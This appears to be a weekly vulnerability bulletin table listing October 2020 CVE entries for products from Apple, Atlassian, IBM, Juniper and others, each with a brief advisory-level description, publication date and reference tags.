apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9884 MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. Processing a maliciously crafted image may lead to arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9936 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8. An attacker with memory write capability may be able to bypass pointer authentication codes and run arbitrary code.	2020-10-16	not yet calculated	CVE-2020-9870 MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved state management. This issue is fixed in iOS 14.0 and iPadOS 14.0, tvOS 14.0, watchOS 7.0. A malicious application may be able to leak sensitive user information.	2020-10-16	not yet calculated	CVE-2020-9976 MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved restrictions. This issue is fixed in iOS 13.6 and iPadOS 13.6, Safari 13.1.2. An issue in Safari Reader mode may allow a remote attacker to bypass the Same Origin Policy.	2020-10-16	not yet calculated	CVE-2020-9911 MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved input validation. This issue is fixed in iOS 13.6 and iPadOS 13.6, tvOS 13.4.8, watchOS 6.2.8, Safari 13.1.2, iTunes 12.10.8 for Windows, iCloud for Windows 11.3, iCloud for Windows 7.20. A remote attacker may be able to cause unexpected application termination or arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9894 MISC MISC MISC MISC MISC MISC MISC
apple — multiple_products	A logic issue was addressed with improved restrictions. This issue is fixed in iOS 14.0 and iPadOS 14.0, macOS Catalina 10.15.7, tvOS 14.0, watchOS 7.0. A malicious application may be able to access restricted files.	2020-10-16	not yet calculated	CVE-2020-9968 MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9889 MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9890 MISC MISC MISC MISC
apple — multiple_products	An out-of-bounds read was addressed with improved bounds checking. This issue is fixed in iOS 13.6 and iPadOS 13.6, macOS Catalina 10.15.6, tvOS 13.4.8, watchOS 6.2.8. Processing a maliciously crafted audio file may lead to arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9891 MISC MISC MISC MISC
apple — safari	An out-of-bounds write issue was addressed with improved bounds checking. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to code execution.	2020-10-16	not yet calculated	CVE-2020-9983 MISC
apple — safari	A type confusion issue was addressed with improved memory handling. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9948 MISC
apple — safari	A use after free issue was addressed with improved memory management. This issue is fixed in Safari 14.0. Processing maliciously crafted web content may lead to arbitrary code execution.	2020-10-16	not yet calculated	CVE-2020-9951 MISC
apple — safari	A logic issue was addressed with improved restrictions. This issue is fixed in Safari 13.1.2. A malicious attacker may be able to change the origin of a frame for a download in Safari Reader mode.	2020-10-16	not yet calculated	CVE-2020-9912 MISC
aptean — product_configurator	An issue was discovered in Aptean Product Configurator 4.61.0000 on Windows. A Time based SQL injection affects the nameTxt parameter on the main login page (aka cse?cmd=LOGIN). This can be exploited directly, and remotely.	2020-10-16	not yet calculated	CVE-2020-26944 MISC MISC
arc_informatique — pcvue	A Denial Of Service vulnerability exists in PcVue from version 8.10 onward, due to the ability for a non-authorized user to modify information used to validate messages sent by legitimate web clients.	2020-10-12	not yet calculated	CVE-2020-26868 MISC
arc_informatique — pcvue	A Remote Code Execution vulnerability exists in PcVue from version 8.10 onward, due to the unsafe deserialization of messages received on the interface.	2020-10-12	not yet calculated	CVE-2020-26867 MISC
arc_informatique — pcvue	An information exposure vulnerability exists in PcVue 12, allowing a non-authorized user to access session data of legitimate users.	2020-10-12	not yet calculated	CVE-2020-26869 MISC
atlassian — jira_server	Affected versions of Atlassian Jira Server allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in Jira issue filter export files. The affected versions are before 8.5.9, from version 8.6.0 before 8.12.3, and from version 8.13.0 before 8.13.1.	2020-10-12	not yet calculated	CVE-2020-14184 MISC
atlassian — jira_server	Affected versions of Jira Server allow remote unauthenticated attackers to enumerate issue keys via a missing permissions check in the ActionsAndOperations resource. The affected versions are before 7.13.18, from version 8.0.0 before 8.5.9, and from version 8.6.0 before version 8.12.2.	2020-10-15	not yet calculated	CVE-2020-14185 MISC
b&r — automation_runtime	A memory leak in the TFTP service in B&R Automation Runtime versions <N4.26, <N4.34, <F4.45, <E4.53, <D4.63, <A4.73 and prior could allow an unauthenticated attacker with network access to cause a denial of service (DoS) condition.	2020-10-15	not yet calculated	CVE-2020-11637 MISC
b&r — gatemanager_4260_and_9250	A log information disclosure vulnerability in B&R GateManager 4260 and 9250 versions <9.0.20262 and GateManager 8250 versions <9.2.620236042 allows authenticated users to view log information reserved for other users.	2020-10-15	not yet calculated	CVE-2020-11646 MISC
b&r — gatemanager_4260_and_9250	An information disclosure vulnerability in B&R GateManager 4260 and 9250 versions <9.0.20262 and GateManager 8250 versions <9.2.620236042 allows authenticated users to view information of devices belonging to foreign domains.	2020-10-15	not yet calculated	CVE-2020-11643 MISC
b&r — gatemanager_4260_and_9250_and_8250	A denial of service vulnerability in B&R GateManager 4260 and 9250 versions <9.0.20262 and GateManager 8250 versions <9.2.620236042 allows authenticated users to limit availability of GateManager instances.	2020-10-15	not yet calculated	CVE-2020-11645 MISC
b&r — gatemanager_4260_and_9250_and_8250	The information disclosure vulnerability present in B&R GateManager 4260 and 9250 versions <9.0.20262 and GateManager 8250 versions <9.2.620236042 allows authenticated users to generate fake audit log messages.	2020-10-15	not yet calculated	CVE-2020-11644 MISC
b&r — sitemanager	The local file inclusion vulnerability present in B&R SiteManager versions <9.2.620236042 allows authenticated users to impact availability of SiteManager instances.	2020-10-15	not yet calculated	CVE-2020-11642 MISC
b&r — sitemanager	A local file inclusion vulnerability in B&R SiteManager versions <9.2.620236042 allows authenticated users to read sensitive files from SiteManager instances.	2020-10-15	not yet calculated	CVE-2020-11641 MISC
bass — audio_library	The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Denial of Service vulnerability (infinite loop) via a crafted .mp3 file. This weakness could allow attackers to consume excessive CPU and the application becomes unresponsive.	2020-10-16	not yet calculated	CVE-2019-18796 MISC MISC
bass — audio_library	The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile Use after Free vulnerability via a crafted .ogg file. An attacker can exploit this to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service.	2020-10-16	not yet calculated	CVE-2019-18794 MISC MISC
bass — audio_library	The BASS Audio Library 2.4.14 under Windows is prone to a BASS_StreamCreateFile out of bounds read vulnerability via a crafted .wav file. An attacker can exploit this issues to gain access to sensitive information that may aid in further attacks. A failure in exploitation leads to denial of service.	2020-10-16	not yet calculated	CVE-2019-18795 MISC MISC
bass — audio_library	The BASSMIDI plugin 2.4.12.1 for Un4seen BASS Audio Library on Windows is prone to an out of bounds write vulnerability. An attacker may exploit this to execute code on the target machine. A failure in exploitation leads to a denial of service.	2020-10-16	not yet calculated	CVE-2019-19513 MISC MISC
bender — comtraxx	In Bender COMTRAXX, user authorization is validated for most, but not all, routes in the system. A user with knowledge about the routes can read and write configuration data without prior authorization. This affects COM465IP, COM465DP, COM465ID, CP700, CP907, and CP915 devices before 4.2.0.	2020-10-16	not yet calculated	CVE-2019-19885 MISC
blackberry — uem_core	An improper input validation vulnerability in the UEM Core of BlackBerry UEM version(s) 12.13.0, 12.12.1a QF2 (and earlier), and 12.11.1 QF3 (and earlier) could allow an attacker to potentially cause a Denial of Service (DoS) of the UEM Core service.	2020-10-14	not yet calculated	CVE-2020-6933 MISC
bluez — bluez	In BlueZ before 5.55, a double free was found in the gatttool disconnect_cb() routine from shared/att.c. A remote attacker could potentially cause a denial of service or code execution, during service discovery, due to a redundant disconnect MGMT event.	2020-10-15	not yet calculated	CVE-2020-27153 MISC MISC MISC
canimaan_software — clamxav	An issue was discovered in ClamXAV 3 before 3.1.1. A malicious actor could use a properly signed copy of ClamXAV 2 (running with an injected malicious dylib) to communicate with ClamXAV 3’s helper tool and perform privileged operations. This occurs because of inadequate client verification in the helper tool.	2020-10-16	not yet calculated	CVE-2020-26893 MISC
cisco — duo_authentication	A privilege escalation vulnerability exists in the Duo Authentication for Windows Logon and RDP implementation. This vulnerability could allow an authenticated local attacker to overwrite files in privileged directories.	2020-10-14	not yet calculated	CVE-2020-3427 CISCO
cisco — duo_network_gateway	Duo has identified and fixed an issue with the Duo Network Gateway (DNG) product in which some customer-provided SSL certificates and private keys were not excluded from logging. This issue resulted in certificate and private key information being written out in plain-text to local files on the DNG host. Any private keys logged in this way could be viewed by those with access to the DNG host operating system without any need for reversing encrypted values or similar techniques. An attacker that gained access to the DNG logs and with the ability to intercept and manipulate network traffic between a user and the DNG, could decrypt and manipulate SSL/TLS connections to the DNG and to the protected applications behind it. Duo Network Gateway (DNG) versions 1.3.3 through 1.5.7 are affected.	2020-10-14	not yet calculated	CVE-2020-3483 CISCO
containerd — containerd	In containerd (an industry-standard container runtime) before version 1.2.14 there is a credential leaking vulnerability. If a container image manifest in the OCI Image format or Docker Image V2 Schema 2 format includes a URL for the location of a specific image layer (otherwise known as a “foreign layer”), the default containerd resolver will follow that URL to attempt to download it. In v1.2.x but not 1.3.0 or later, the default containerd resolver will provide its authentication credentials if the server where the URL is located presents an HTTP 401 status code along with registry-specific HTTP headers. If an attacker publishes a public image with a manifest that directs one of the layers to be fetched from a web server they control and they trick a user or system into pulling the image, they can obtain the credentials used for pulling that image. In some cases, this may be the user’s username and password for the registry. In other cases, this may be the credentials attached to the cloud virtual instance which can grant access to other cloud resources in the account. The default containerd resolver is used by the cri-containerd plugin (which can be used by Kubernetes), the ctr development tool, and other client programs that have explicitly linked against it. This vulnerability has been fixed in containerd 1.2.14. containerd 1.3 and later are not affected. If you are using containerd 1.3 or later, you are not affected. If you are using cri-containerd in the 1.2 series or prior, you should ensure you only pull images from trusted sources. Other container runtimes built on top of containerd but not using the default resolver (such as Docker) are not affected.	2020-10-16	not yet calculated	CVE-2020-15157 MISC CONFIRM
crossbeam — crossbeam	Crossbeam is a set of tools for concurrent programming. In crossbeam-channel before version 0.4.4, the bounded channel incorrectly assumes that `Vec::from_iter` has allocated capacity that same as the number of iterator elements. `Vec::from_iter` does not actually guarantee that and may allocate extra memory. The destructor of the `bounded` channel reconstructs `Vec` from the raw pointer based on the incorrect assumes described above. This is unsound and causing deallocation with the incorrect capacity when `Vec::from_iter` has allocated different sizes with the number of iterator elements. This has been fixed in crossbeam-channel 0.4.4.	2020-10-16	not yet calculated	CVE-2020-15254 MISC MISC CONFIRM MISC
dca — vantage_analyzer	A vulnerability has been identified in DCA Vantage Analyzer (All versions < V4.5 are affected by CVE-2020-7590. In addition, serial numbers < 40000 running software V4.4.0 are also affected by CVE-2020-15797). Affected devices use a hard-coded password to protect the onboard database. This could allow an attacker to read and or modify the onboard database. Successful exploitation requires direct physical access to the device.	2020-10-13	not yet calculated	CVE-2020-7590 MISC
dca — vantage_analyzer	A vulnerability has been identified in DCA Vantage Analyzer (All versions < V4.5 are affected by CVE-2020-7590. In addition, serial numbers < 40000 running software V4.4.0 are also affected by CVE-2020-15797). Improper Access Control could allow an unauthenticated attacker to escape from the restricted environment (“kiosk mode”) and access the underlying operating system. Successful exploitation requires direct physical access to the system.	2020-10-13	not yet calculated	CVE-2020-15797 MISC
debian — sympa	debian/sympa.postinst for the Debian Sympa package before 6.2.40~dfsg-7 uses mode 4755 for sympa_newaliases-wrapper, whereas the intended permissions are mode 4750 (for access by the sympa group)	2020-10-10	not yet calculated	CVE-2020-26932 MISC MISC
dell — emc_networker	Dell EMC NetWorker versions prior to 19.3.0.2 contain an incorrect privilege assignment vulnerability. A non-LDAP remote user with low privileges may exploit this vulnerability to perform ‘saveset’ related operations in an unintended manner. The vulnerability is not exploitable by users authenticated via LDAP.	2020-10-16	not yet calculated	CVE-2020-26182 CONFIRM
dell — emc_networker	Dell EMC NetWorker versions prior to 19.3.0.2 contain an improper authorization vulnerability. Certain remote users with low privileges may exploit this vulnerability to perform ‘nsrmmdbd’ operations in an unintended manner.	2020-10-16	not yet calculated	CVE-2020-26183 CONFIRM
desigo — insight	A vulnerability has been identified in Desigo Insight (All versions). Some error messages in the web application show the absolute path to the requested resource. This could allow an authenticated attacker to retrieve additional information about the host system.	2020-10-15	not yet calculated	CVE-2020-15794 MISC
desigo — insight	A vulnerability has been identified in Desigo Insight (All versions). The web service does not properly apply input validation for some query parameters in a reserved area. This could allow an authenticated attacker to retrieve data via a content-based blind SQL injection attack.	2020-10-15	not yet calculated	CVE-2020-15792 MISC
desigo — insight	A vulnerability has been identified in Desigo Insight (All versions). The device does not properly set the X-Frame-Options HTTP Header which makes it vulnerable to Clickjacking attacks. This could allow an unauthenticated attacker to retrieve or modify data in the context of a legitimate user by tricking that user to click on a website controlled by the attacker.	2020-10-15	not yet calculated	CVE-2020-15793 MISC
eclipse — vert	In Eclipse Vert.x 3.4.x up to 3.9.4, 4.0.0.milestone1, 4.0.0.milestone2, 4.0.0.milestone3, 4.0.0.milestone4, 4.0.0.milestone5, 4.0.0.Beta1, 4.0.0.Beta2, and 4.0.0.Beta3, StaticHandler doesn’t correctly processes back slashes on Windows Operating systems, allowing, escape the webroot folder to the current working directory.	2020-10-15	not yet calculated	CVE-2019-17640 CONFIRM
electron — wire	In Wire before 3.20.x, `shell.openExternal` was used without checking the URL. This vulnerability allows an attacker to execute code on the victims machine by sending messages containing links with arbitrary protocols. The victim has to interact with the link and sees the URL that is opened. The issue was patched by implementing a helper function which checks if the URL’s protocol is common. If it is common, the URL will be opened externally. If not, the URL will not be opened and a warning appears for the user informing them that a probably insecure URL was blocked from being executed. The issue is patched in Wire 3.20.x. More technical details about exploitation are available in the linked advisory.	2020-10-16	not yet calculated	CVE-2020-15258 MISC MISC CONFIRM
emby — emby_server	Emby Server before 4.5.0 allows SSRF via the Items/RemoteSearch/Image ImageURL parameter.	2020-10-10	not yet calculated	CVE-2020-26948 MISC MISC
excast — pro_ii	In EZCast Pro II, the administrator password md5 hash is provided upon a web request. This hash can be cracked to access the administration panel of the device.	2020-10-16	not yet calculated	CVE-2019-12305 MISC
excellium — helpdeskz	UNSUPPORTED WHEN ASSIGNED An issue was discovered in HelpDeskZ 1.0.2. The feature to auto-login a user, via the RememberMe functionality, is prone to SQL injection. NOTE: This vulnerability only affects products that are no longer supported by the maintainer.	2020-10-12	not yet calculated	CVE-2020-26546 MISC
f2fs-tools — f2fs-tools	An exploitable code execution vulnerability exists in the multiple devices functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause Information overwrite resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.	2020-10-15	not yet calculated	CVE-2020-6105 MISC
f2fs-tools — f2fs-tools	An exploitable information disclosure vulnerability exists in the get_dnode_of_data functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause information disclosure resulting in a information disclosure. An attacker can provide a malicious file to trigger this vulnerability.	2020-10-15	not yet calculated	CVE-2020-6104 MISC
f2fs-tools — f2fs-tools	An exploitable information disclosure vulnerability exists in the init_node_manager functionality of F2fs-Tools F2fs.Fsck 1.12 and 1.13. A specially crafted filesystem can be used to disclose information. An attacker can provide a malicious file to trigger this vulnerability.	2020-10-15	not yet calculated	CVE-2020-6106 MISC
f2fs-tools — f2fs-tools	An exploitable code execution vulnerability exists in the fsck_chk_orphan_node functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause a heap buffer overflow resulting in a code execution. An attacker can provide a malicious file to trigger this vulnerability.	2020-10-15	not yet calculated	CVE-2020-6108 MISC
f2fs-tools — f2fs-tools	An exploitable information disclosure vulnerability exists in the dev_read functionality of F2fs-Tools F2fs.Fsck 1.13. A specially crafted f2fs filesystem can cause an uninitialized read resulting in an information disclosure. An attacker can provide a malicious file to trigger this vulnerability.	2020-10-15	not yet calculated	CVE-2020-6107 MISC
foxit — reader	This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.0.1.35811. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the handling of the Annotation objects. The issue results from the lack of validating the existence of an object prior to performing operations on the object. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11657.	2020-10-13	not yet calculated	CVE-2020-17417 N/A N/A
foxit — reader	This vulnerability allows remote attackers to execute arbitrary code on affected installations of Foxit Reader 10.0.0.35798. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file. The specific flaw exists within the parsing of JPEG2000 images. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated structure. An attacker can leverage this vulnerability to execute code in the context of the current process. Was ZDI-CAN-11497.	2020-10-13	not yet calculated	CVE-2020-17416 N/A N/A
gitea — gitea	The git hook feature in Gitea 1.1.0 through 1.12.5 allows for authenticated remote code execution.	2020-10-16	not yet calculated	CVE-2020-14144 MISC MISC MISC
gitlab — gitlab	An issue has been discovered in GitLab affecting all versions prior to 13.2.10, 13.3.7 and 13.4.2. Insufficient permission check allows attacker with developer role to perform various deletions.	2020-10-12	not yet calculated	CVE-2020-13341 CONFIRM MISC MISC
gogs — gogs	The git hook feature in Gogs 0.5.5 through 0.12.2 allows for authenticated remote code execution.	2020-10-16	not yet calculated	CVE-2020-15867 MISC
google — android	In binder_release_work of binder.c, there is a possible use-after-free due to improper locking. This could lead to local escalation of privilege in the kernel with no additional execution privileges needed. User interaction is not needed for exploitation.Product: AndroidVersions: Android kernelAndroid ID: A-161151868References: N/A	2020-10-14	not yet calculated	CVE-2020-0423 MISC
google — android	This affects all versions of package com.mintegral.msdk:alphab. The Android SDK distributed by the company contains malicious functionality in this module that tracks: 1. Downloads from Google urls either within Google apps or via browser including file downloads, e-mail attachments and Google Docs links. 2. All apk downloads, either organic or not. Mintegral listens to download events in Android’s download manager and detects if the downloaded file’s url contains: a. google.com or comes from a Google app (the com.android.vending package) b. Ends with .apk for apk downloads In both cases, the module sends the captured data back to Mintegral’s servers. Note that the malicious functionality keeps running even if the app is currently not in focus (running in the background).	2020-10-15	not yet calculated	CVE-2020-7744 MISC MISC MISC
grocy — grocy	Versions of Grocy <= 2.7.1 are vulnerable to Cross-Site Scripting via the Create Shopping List module, that is rendered upon deleting that Shopping List. The issue was also found in users, batteries, chores, equipment, locations, quantity units, shopping locations, tasks, taskcategories, product groups, recipes and products. Authentication is required to exploit these issues and Grocy should not be publicly exposed. The linked reference details a proof-of-concept.	2020-10-14	not yet calculated	CVE-2020-15253 MISC MISC MISC CONFIRM
huawei — mate_20_devices	There is an information disclosure vulnerability in several smartphones. The device does not sufficiently validate the identity of smart wearable device in certain specific scenario, the attacker need to gain certain information in the victim’s smartphone to launch the attack, and successful exploit could cause information disclosure.Affected product versions include:HUAWEI Mate 20 versions earlier than 10.1.0.160(C00E160R3P8),versions earlier than 10.1.0.160(C01E160R2P8);HUAWEI Mate 20 X versions earlier than 10.1.0.160(C00E160R2P8),versions earlier than 10.1.0.160(C01E160R2P8);HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8);Laya-AL00EP versions earlier than 10.1.0.160(C786E160R3P8);Tony-AL00B versions earlier than 10.1.0.160(C00E160R2P11);Tony-TL00B versions earlier than 10.1.0.160(C01E160R2P11).	2020-10-12	not yet calculated	CVE-2020-9109 MISC
huawei — p30_pro_devices	HUAWEI P30 Pro versions earlier than 10.1.0.160(C00E160R2P8) and versions earlier than 10.1.0.160(C01E160R2P8) have a buffer overflow vulnerability. An attacker induces users to install malicious applications and sends specially constructed packets to affected devices after obtaining the root permission. Successful exploit may cause code execution.	2020-10-12	not yet calculated	CVE-2020-9123 MISC
ibm — curam_social_program_management	An improper input validation before calling java readLine() method may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which could result in a denial of service. IBM X-Force ID: 189159.	2020-10-12	not yet calculated	CVE-2020-4781 XF CONFIRM
ibm — curam_social_program_management	An XPath vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, caused by the improper handling of user-supplied input. By sending a specially-crafted input, a remote attacker could exploit this vulnerability to obtain unauthorized access or reveal sensitive information such as XML document structure and content. IBM X-Force ID: 189152.	2020-10-12	not yet calculated	CVE-2020-4774 XF CONFIRM
ibm — curam_social_program_management	A HTTP Verb Tampering vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. By sending a specially-crafted request, an attacker could exploit this vulnerability to bypass security access controls. IBM X-Force ID: 189156.	2020-10-12	not yet calculated	CVE-2020-4779 XF CONFIRM
ibm — curam_social_program_management	A cross-site request forgery (CSRF) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which is an attack that forces a user to execute unwanted actions on the web application while they are currently authenticated. This applies to a single server class only, with no impact to remainder of web application. IBM X-Force ID: 189151.	2020-10-12	not yet calculated	CVE-2020-4773 XF CONFIRM
ibm — curam_social_program_management	OOTB build scripts does not set the secure attribute on session cookie which may impact IBM Curam Social Program Management 7.0.9 and 7.0,10. The purpose of the ‘secure’ attribute is to prevent cookies from being observed by unauthorized parties. IBM X-Force ID: 189158.	2020-10-12	not yet calculated	CVE-2020-4780 XF CONFIRM
ibm — curam_social_program_management	An XML External Entity Injection (XXE) vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10. A remote attacker could exploit this vulnerability to expose sensitive information, denial of service, server side request forgery or consume memory resources. IBM X-Force ID: 189150.	2020-10-12	not yet calculated	CVE-2020-4772 XF CONFIRM
ibm — curam_social_program_management	IBM Curam Social Program Management 7.0.9 and 7.0.10 uses MD5 algorithm for hashing token in a single instance which less safe than default SHA-256 cryptographic algorithm used throughout the CÃºram application. IBM X-Force ID: 189156.	2020-10-12	not yet calculated	CVE-2020-4778 XF CONFIRM
ibm — curam_social_program_management	A path traversal vulnerability may impact IBM Curam Social Program Management 7.0.9 and 7.0.10, which could allow a remote attacker to traverse directories on the system. An attacker could send a specially-crafted file path in URL request to view arbitrary files on the system. IBM X-Force ID: 189154.	2020-10-12	not yet calculated	CVE-2020-4776 XF CONFIRM
ibm — resilient_onprem	IBM Resilient OnPrem 38.2 could allow a privileged user to inject malicious commands through Python3 scripting. IBM X-Force ID: 185503.	2020-10-16	not yet calculated	CVE-2020-4636 XF CONFIRM
ibm — security_access_manager	IBM Security Access Manager Appliance 9.0.7 does not invalidate session after logout which could allow an authenticated user to impersonate another user on the system. IBM X-Force ID: 179358.	2020-10-14	not yet calculated	CVE-2020-4395 XF CONFIRM
ibm — security_access_manager_and_security_verify_access	IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive using timing side channel attacks which could aid in further attacks against the system. IBM X-Force ID: 186947.	2020-10-12	not yet calculated	CVE-2020-4699 XF CONFIRM
ibm — security_access_manager_and_security_verify_access	IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an unauthorized public Oauth client to bypass some or all of the authentication checks and gain access to applications. IBM X-Force ID: 182216.	2020-10-15	not yet calculated	CVE-2020-4499 XF CONFIRM
ibm — security_access_manager_and_security_verify_access	IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive using timing side channel attacks which could aid in further attacks against the system. IBM X-Force ID: 186142.	2020-10-12	not yet calculated	CVE-2020-4661 XF CONFIRM
ibm — security_access_manager_and_security_verify_access	IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 could allow an attacker to obtain sensitive using timing side channel attacks which could aid in further attacks against the system. IBM X-Force ID: 186140.	2020-10-12	not yet calculated	CVE-2020-4660 XF CONFIRM
ibm — security_access_manager_and_security_verify_access	IBM Security Access Manager 9.0.7 and IBM Security Verify Access 10.0.0 are vulnerable to HTTP response splitting attacks. A remote attacker could exploit this vulnerability using specially-crafted URL to cause the server to return a split response, once the URL is clicked. This would allow the attacker to perform further attacks, such as Web cache poisoning, cross-site scripting, and possibly obtain sensitive information. IBM X-Force ID: 165960.	2020-10-15	not yet calculated	CVE-2019-4552 XF CONFIRM
ibm — security_guardium_big_data_intelligence	IBM Security Guardium Big Data Intelligence 1.0 (SonarG) uses weaker than expected cryptographic algorithms that could allow an attacker to decrypt highly sensitive information. IBM X-Force ID: 175560.	2020-10-16	not yet calculated	CVE-2020-4254 XF CONFIRM
iproom — mmc+_server	IProom MMC+ Server login page does not validate specific parameters properly. Attackers can use the vulnerability to redirect to any malicious site and steal the victim’s login credentials.	2020-10-14	not yet calculated	CVE-2020-24551 MISC
jfrog — artifactory	Jfrog Artifactory uses default passwords (such as “password”) for administrative accounts and does not require users to change them. This may allow unauthorized network-based attackers to completely compromise of Jfrog Artifactory. This issue affects Jfrog Artifactory versions prior to 6.17.0.	2020-10-12	not yet calculated	CVE-2019-17444 MISC MISC
juniper_networks — ex2300_series_devices	On Juniper Networks EX2300 Series, receipt of a stream of specific multicast packets by the layer2 interface can cause high CPU load, which could lead to traffic interruption. This issue occurs when multicast packets are received by the layer 2 interface. To check if the device has high CPU load due to this issue, the administrator can issue the following command: user@host> show chassis routing-engine Routing Engine status: … Idle 2 percent the “Idle” value shows as low (2 % in the example above), and also the following command: user@host> show system processes summary … PID USERNAME PRI NICE SIZE RES STATE TIME WCPU COMMAND 11639 root 52 0 283M 11296K select 12:15 44.97% eventd 11803 root 81 0 719M 239M RUN 251:12 31.98% fxpc{fxpc} the eventd and the fxpc processes might use higher WCPU percentage (respectively 44.97% and 31.98% in the above example). This issue affects Juniper Networks Junos OS on EX2300 Series: 18.1 versions prior to 18.1R3-S11; 18.2 versions prior to 18.2R3-S5; 18.3 versions prior to 18.3R2-S4, 18.3R3-S3; 18.4 versions prior to 18.4R2-S5, 18.4R3-S4; 19.1 versions prior to 19.1R3-S2; 19.2 versions prior to 19.2R1-S5, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2-S1, 19.4R3; 20.1 versions prior to 20.1R1-S2, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1668 CONFIRM
juniper_networks — ex4300_series_devices	On Juniper Networks EX4300 Series, receipt of a stream of specific IPv4 packets can cause Routing Engine (RE) high CPU load, which could lead to network protocol operation issue and traffic interruption. This specific packets can originate only from within the broadcast domain where the device is connected. This issue occurs when the packets enter to the IRB interface. Only IPv4 packets can trigger this issue. IPv6 packets cannot trigger this issue. This issue affects Juniper Networks Junos OS on EX4300 series: 17.3 versions prior to 17.3R3-S9; 17.4 versions prior to 17.4R2-S11, 17.4R3-S2; 18.1 versions prior to 18.1R3-S10; 18.2 versions prior to 18.2R3-S4; 18.3 versions prior to 18.3R2-S4, 18.3R3-S2; 18.4 versions prior to 18.4R2-S4, 18.4R3-S2; 19.1 versions prior to 19.1R2-S2, 19.1R3-S1; 19.2 versions prior to 19.2R1-S5, 19.2R2-S1, 19.2R3; 19.3 versions prior to 19.3R2-S4, 19.3R3; 19.4 versions prior to 19.4R1-S3, 19.4R2; 20.1 versions prior to 20.1R1-S3, 20.1R2.	2020-10-16	not yet calculated	CVE-2020-1670 MISC
juniper_networks — ex4600_and_qfx_5000_series_devices	When configuring stateless firewall filters in Juniper Networks EX4600 and QFX 5000 Series devices using Virtual Extensible LAN protocol (VXLAN), the discard action will fail to discard traffic under certain conditions. Given a firewall filter configuration similar to: family ethernet-switching { filter L2-VLAN { term ALLOW { from { user-vlan-id 100; } then { accept; } } term NON-MATCH { then { discard; } } when there is only one term containing a ‘user-vlan-id’ match condition, and no other terms in the firewall filter except discard, the discard action for non-matching traffic will only discard traffic with the same VLAN ID specified under ‘user-vlan-id’. Other traffic (e.g. VLAN ID 200) will not be discarded. This unexpected behavior can lead to unintended traffic passing through the interface where the firewall filter is applied. This issue only affects systems using VXLANs. This issue affects Juniper Networks Junos OS on QFX5K Series: 18.1 versions prior to 18.1R3-S7, except 18.1R3; 18.2 versions prior to 18.2R2-S7, 18.2R3-S1; 18.3 versions prior to 18.3R1-S5, 18.3R2-S4, 18.3R3; 18.4 versions prior to 18.4R1-S7, 18.4R2-S1, 18.4R3; 19.1 versions prior to 19.1R1-S5, 19.1R2; 19.2 versions prior to 19.2R1-S5, 19.2R2.	2020-10-16	not yet calculated	CVE-2020-1685 CONFIRM
